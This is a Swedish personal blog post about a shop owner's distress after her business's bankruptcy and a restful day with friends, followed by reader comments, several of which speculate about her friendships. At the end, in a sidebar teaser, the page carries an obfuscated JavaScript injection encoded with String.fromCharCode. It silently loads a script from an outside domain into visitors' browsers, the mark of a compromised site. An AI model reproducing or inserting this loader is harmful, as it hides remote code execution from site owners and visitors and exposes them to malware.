Igår var en BRA dag

IMG_7361

Godmorgon!  Att komma ”Hem” till Sigtuna blev ett bakslag. Allt blev så verkligt på något sätt. Det känns så ”tomt” Ingen mobil som ringer dygnet runt. Ingen auktion att bevaka, ingen butik att jobba med…. Jätte konstig känsla! Jag har inte varit hemma mer än och vänt sista tiden.

I veckan fick jag tömma kontoret. Kontoret där jag under tio års tid samlat på mig ”bra att ha prylar” som jag inte kunnat göra mig av med eller slänga. Du vet sånt där dom ”betyder” något, som man ändå inte vill ha framme… men ändå vill spara! Så som pricken över i  har jag behöva rensa bland massa grejer som OCKSÅ drar up en massa känslor!

Foton på mig som barn, foton från mig och Ludvigs pappa. Förlovnings presenter, skolotografier, babykläder, hmmm…. hur mycket som helst! Allt detta är just nu parkerat MITT i våran lägenhet! Jag som vanligtvis är ganska pedant blir mer än stressad av detta. Känslorna ligger som utanpå kroppen och saker som inte als känns jobbigt annars känns plötslig mega tungt! Såhär ser det ut hemma hos oss just nu… 

IMG_7356OLYMPUS DIGITAL CAMERA

 

Igår ”blundade” jag för det. jag lyssnade på ett gott råd ” skit i skiten”  och åkte ut till Terece i Vettershaga.

Att ”vänta” på konkursfövlataren och vad som ska hände sen, driver mig till vansinne. Jag vill avsluta det NU. Få en chans att börja andas normalt och sakta men säkert gå framåt… Men som sagt, för min del just nu…. Bara att vänta. 

OLYMPUS DIGITAL CAMERA

Igår var en väldigt bra dag…. inga tårar på hela dagen. Jag tänkte inte så mycket als. att få hem Ludvig gör så gott i hjärtat. Inför honom måste jag vara stark. barnen lekte, hundarna busade, och jag försökts att koppla av och skingra tankarna. Vi åkte ut strax efter lunch. Då hade jag suttit några timmar med konkursjobbet. Inget roligt, men ett måste. Jag satte mig i bilen, spände fast Lilleman och började köra. Jag var pigg. Lilleman somnade töstan direkt, det visste jag att han skulle göra. Men efter ca en halvtimme så fick jag stanna bilen och fälla sätet. Jag kunde inte hålla ögonen öppna?! Jag är mer än van att köra bil, långdistans. Men den där tröttheten slog till mig från ingenstans. Så jag somnade direkt när jag parkerat och vaknade ca 20 min senare. Skrämmande! Det är många saker som händer med mig själv och min kropp just nu… Väl framme hos Terece & Marcus var jag pigg igen.

Strax efter oss så kom även Herr & Fru Herrey. Hela famnen full av fika =) OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

 

OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA

Tur att Marie ville bada, när jag själv ”glömde” min bikini! hehe! 

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

VI grillade hamburgare och åt middagen ute på bryggan… Det är Svensk sommar det!  OLYMPUS DIGITAL CAMERAIMG_7420

OLYMPUS DIGITAL CAMERA

 

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

 

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAIMG_7438

 

Det var som balsam för själen. Att smita undan en stund.. bara vara i goda vänner sällskap och umgås…. 

OLYMPUS DIGITAL CAMERA Vi båda somnade när vi kom hem på kvällen. Men jag vaknar av ångest. Mitt i natten, precis som innan. Tusen frågor, ”vad händer nu?” ”Vad ska jag göra nu” ”hur lång tid kommer konkursen att ta”. jag somnade om en stund igen, men vaknade strax efter 04:00 och kunde inte somna om. 

Jag är HELT orkeslös, ingen energi, ingen ork att göra någonting…  Bara ledsen, handfallen och trött!

Igår var en bra dag, idag känns det tungt, väldigt tungt… IMG_7455

Tack för att DU finns <3

40 Komentarer

 1. Du är stark. Du klarar allt du vill klara, så är det. Ett motto jag själv går efter är ”Vill man, så kan man”. Och DU både VILL och KAN. Självklart måste man tillåta sig själv att må dåligt också, det är viktigt. Men efter ett tag måste man säga till sig själv, nä nu får jag faaaan taaa miiii skärpa mig!! Så kanske man klarar det i några timmar, kanske någon dag. Glöm inte att peppa dig själv och glöm inte att prata om det (förutom att skriva om det så MÅSTE man prata om det). Kramar <3 <3

 2. Hej My, ett litet tips till dig för att kanske må bättre är att städa, det brukar kännas motigt innan men det kan bidra till ett välbefinnande speciellt om man tycker om fina miljöer vilket jag tror du gör. Köp hem eller plocka in lite blommor i någon av dina fina vaser, fortsätt hämta energi från blommorna du älskar. De kommer alltid att finnas. Det finns ingenting som säger att du inte kan öppna en liten butik igen någon annanstans. Sen tror jag du har jättefina sanna vänner där du varit nu. Nya tag! Kramar

 3. Men så fint att se My att du o din som fått bli lite omhändertagna av riktiga vänner, sådana som bryr sig i motvind, ja det är just sådana vänner många önskar att de hade. Marie o Rickard Herrey verkar vara mycket jordnära o mycket empatiska vänner. Grattis till sådan fin vänskap. Allt gott till dig o din son.

 4. Du beskriver känslan precis som jag kände då mitt kontor låg överallt i min lägenhet. Ena dagen känns bra andra förjävlig men det går över och blir bra, du har det i dig ”jävlaranamma”. Imorgon är en annan dag…..Ha inte för stora krav gör lite varje dag så känns det bättre. Tina

 5. Vad skönt att du hade en bra dag igår. Du ska se att dom dagarna kommer igen. Försök att intala dig själv o då oxå på dagen – att det du inte kan påverka själv, är ingen mening med att älta o man får försöka släppa det. Enkelt att skriva jag vet, lättare sagt än gjort. Som någon skrev, så är det nog bra om du röjer i din lägenhet. Ta hjälp utav någon. Att gå o se på det yttre kaoset tror jag gör det jobbigare. Styrkekramar till dig <3

 6. Var finns din bästa vän M Graaf ?
  Det verkar en hel del turbulent
  när man kollar på insta . M Ilmrud
  Graaf, Toftby någonting måste ha hänt

  • Varför frågar du inte de namngivna personerna istället? Eller är dessa också, liksom My, smarta nog att sköta sitt internt?

   • My har ju skrivit så mycket gott om sina goda vänner Graaf och Ilmrud (kanske inte i lika possitva toner om Toftby) så det är väl inte konstigt att frågan ställs.

  • Men du har ju ytterligare tre jobb. Nu behöver du inte längre försörja blomsteraffären så det kan ju bara bli bättre.

  • Tänkte precis också fråga om Magdalena. Bästa vännen din måste du väl kunna åka till. Har saknat dig där alldeles för länge nu. Är det nå vajsing?

 7. Du nyfikna lilla ”M”, kan du inte bara lägga ner, blä ?
  All heder till My som mitt i allt kaos orkar ”ge” oss läsare så mycket av sig själv!

 8. Hej My! Jag sänder stora varma kramar till dig! Skulle vilja säga en massa tröstande ord men det är svårt i text och det hjälper ju kanske inte direkt i din känsla och situation men du ska ändå veta att vi är många som läser din blogg för att du är du och för att du inspirerar oss läsare. Ha en fin dag med din prins! Kram igen

 9. Hej, har du inget annat arbete som du arbetar med på dagarna eller har du semester? För butiken var väl inte ditt ända arbete? Hade du dina bröllopspresenter på kontoret? Ser fram emot att få läsa vad du gör om dagarna när du inte har butiken längre. Härligt att du verkar ha det med dina vänner och din fina son. Om du städar i lägenheten ska du se att du mår mycket bättre. Lycka till och glad sommar ?

 10. Magdalena har varit en fantastisk vän för My. Hon och hennes pojke har ju i stort sett bott hos Magdalena senaste året. När Magdalena själv gått igenom en stor tragedi! En konkurs kommer inte ur luften. Först försöker man allt för att rädda ekonomin i företaget.
  My, varför finns inte dina närmaste vänner där för dej? Jättekonstigt måste jag säga som följt er.

  • Men hur vet vi att de inte finns där? Man skriver kanske inte allt i en blogg. Hoppas du har goda vänner omkring dig, My.

  • Ja, eller hur….?
   Magdalena följer Inte My längre på Instagram..Och dessutom har Magdalena börjat gilla bilder hos fröken Johanna Toftby, mycket märkligt…!
   Då har det gått långt om man gillar hos henne ( Toftby ) alltså. Någon mer kändiskåt person får man länge leta efter.
   Ta väl hand om dig My och lilleman förstås!!!
   Får hoppas att det här snart löser sig och att ni får en mysig sommar tråtts allt!

 11. Ni som tycker att My ska städa för att må bättre !!! Ni har inte minsta lilla kunskap om vad en depression och ångest är … man blir ledsen och besviken över denna totala okunskapen, LÄS PÅ !!!!!!

 12. Hej, kan det handla om den s.k listan på killar som någon skrev om ? My är väl singel och gör vad hon vill ! Stor styrkekram My !

 13. Jag undrar om alla frågor om vänskap, stöd och liknande som skrivs i kommentarerna verkligen är ärligt menade eller om det är ett sätt att skapa lite extra sensation i kommentarsfältet men också i sitt eget liv. Förstår överhuvudtaget inte intresset i att få reda på vilken bloggare som stöder vem osv. Vill jag veta vad en bloggare gör så läser jag den bloggen och vill jag veta något om nån annan så läser jag dennas blogg. Släpp det där med vem som stöder vem nu och ta hand om era egna vänner istället. Jag är säker på att alla bloggare fixar sina relationer utan ”vår hjälp”. Det kommer bättre dagar My! Om det känns som att du tappat allt just nu så ska du inte glömma att du är en entreprenör och därmed kommer du att hitta nya idéer, vägar och lösningar. Det är värre för dem som inte har den gnistan du har och till din fördel har du också att du är ung! Det kommer att lösa sig med allt så småningom. Kram!

 14. Jag har frågat Magdalens om hon och My är oense om något men hon lägger inte ens ut den kommentaren så då är det säkert något. Det är väl bara att säga att det är så sen är det deras ensak och ingen behöver bry sej.

 15. Herregud vad folk är nyfikna om Mys vänskap…!! Vem hon umgås med och när är hennes ensak.. Inte en massa nyfikna kärringar

 16. Jag blir så snurrig. Sitter inte och läser varenda sida upp och rad ner, är inte inne på instagram eller vad det heter. Läser ibland när jag inte har annat att göra. Få gånger. Jag fattar ingenting när jag läser kommentarerna. Vad då osams, vaddå lista, vaddå killar, vaddå då???? Kan någon i korthet förklara vad som händer? Det känns som om jag sitter i en sandlåda med ett fång småbarn som jag ska försöka reda ut vem som sa vad och vem som tog vems till hur och vem och vem vet vad??? Är vuxna människor osams över en lista? Tar vänner avstånd för vad då? Vem är Toftby? Nån jag gått in på en gång och som bara är ute och cyklar eller? Nån tyckte fruktansvärt illa om henne. Har hon gjort nått?

 17. Men för i helvete, sluta spekulera så mycket. Vissa här är så jäkla nyfikna att ni tappat all empati att dessa frågor kanske inte passar nu.
  Vilken fin dag du verkar ha haft, härliga bilder, tack för att du orkar dela med dig.
  Önskar så att nån av dina vänner bara kunde åka hem och hjälpa dig rensa i röran. Jobbigt att ta tag i om man mår dåligt.
  Allt gott My önskar jag dig ❤️ Kram

 18. Usch!! En del borde verkligen skämmas. Tänk ett steg längre än ni gör innan ni skriver era kommentarer. Tror ni My mår bättre av att läsa det ni vräker ur er.
  För övrigt har ni ingen aning om vem eller vilka hon har kontakt med. Det finns något som heter telefon.
  Och även om My delar med sig av det mesta som händer i hennes liv så tror jag inte allt kommer med i bloggen. Så sluta att spekulera om det ni inte vet något om.

 19. Det är inte konstigt att bli så där trött på en gång. Din kropp säger till att den behöver vila, och du lyssnade på det och la dig i bilen. Jättebra! Kanske kommer du uppskatta dessa stunder i längden, att bara få stanna upp kroppsligt. SÄger inte att det MÅSTE bli så men för mig var det så… Kunde bli extremt trött och bara somna var som helst. Kram till dig idag igen…

 20. Hej, My!
  Kan du inte ge oss några blogginlägg om resor, personliga reportage, hälsoreportage som du nämnde i ett inlägg att du jobbar med också att göra. Det hade varit en trevlig läsning ? Jag undrar också varför du inte avvecklade din butik innan när den gick dåligt eller sålde den. Varför först nu?

 21. Vad snällt att du är så öppen när man förstår hur tufft du har det! Men jag brukar tänka på hur många år man har framför sig (förhoppningsvis) och vad gör det då att man mår dåligt en tid nu, när man har kanske 70 år kvar att må bra på ?! ? Jag vet hur svart livet kan kännas, men det kommer såklart bli bättre!
  Vad fin du är i glasögon!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/